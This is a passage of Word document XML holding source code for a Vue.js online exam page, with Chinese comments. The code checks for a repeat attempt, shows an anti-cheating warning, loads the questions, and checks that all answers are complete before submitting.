    <w:p w14:paraId="2BE0A771" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      questions: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484649A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      examId: null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46145DE2" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      tableData: null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16627D32" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B69B5B0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C0891" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  created() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28915E2C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // router = useRouter(); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> router </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD67A00" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.examId = this.$router.currentRoute.value.query.examId; // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> examId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E134A4D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    detect_examed(this.examId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6516243E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D79482D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if (res.double_check == true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D29E2B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (res.exam_type == "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0ABDD3" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            ElMessageBox.alert('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿重复参加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', res.exam_type, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26211834" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">              confirmButtonText: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAA407B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              type: 'warning',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4478945D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              callback: () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E079EB" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                this.$router.push({ name: "/exam/list" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB206D0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC1641" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AE9A67" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45660C47" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参加过本次测试，但是本次测试不是考试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F1D5BC" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            get_old_results(this.examId).then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A17FB7" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              this.tableData = res.data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAD510A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500AEA5D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCDC3D5" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE983F" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          console.log('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未参加过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8388DF" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2026A0A4" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试反作弊告警</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED6DF4" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          ElMessageBox.alert('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>勿将鼠标移动页面之外，勿切屏，避免考试失败。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防作弊警示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239FC9DD" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            confirmButtonText: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440FDACF" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            type: 'warning',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4A0188" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            callback: () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45297913" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">              console.log('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户点击了确定按钮</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6316B05B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787886D2" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D9187B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8CF9A2" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取试卷</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44517240" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          get_exam_paper(this.examId).then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0398D626" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对选项进行切割</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C1B91" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            this.questions = res.question_list.map(question =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A4025" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">              if (question.question_type === '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多选</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>' || question.question_type === '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单选</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219BCDAB" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                question.options = question.choice_text.split('|').map(option =&gt; option.trim());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712DE745" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E2D38" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              // question.options = question.choice_text.split('|').map(option =&gt; option.trim());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9673A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              return question;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382A0A84" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE239E7" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D4257D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39AF0CB2" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B86CBCE" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4547B8" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DD4C49" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C482AE" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED63849" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  updated() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3A11A7" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    console.log(this.questions);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3F1F0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125357F" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  methods: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B81EA2F" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1201C487" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    submitCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DD178A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否答完</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DCFCF0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      let isComplete = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE03F48" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      this.questions.forEach((question, i) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E87A8F" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if (!question.stu_answer || question.stu_answer.length === 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB28BC7" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          isComplete = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A9243D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE014ED" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F76A0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6D09C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003DCD83" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if (isComplete) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E01D016" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // console.log(this.questions);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698D05C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        submit_exam_paper(this.examId, this.questions);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7E1EA8" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        alert('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交卷成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146AE694" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        this.$router.push({ name: "/exam/list" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641C838C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF6C26" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        ElMessageBox.alert('', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目未答完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6014C2EC" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          confirmButtonText: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786BEC3" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
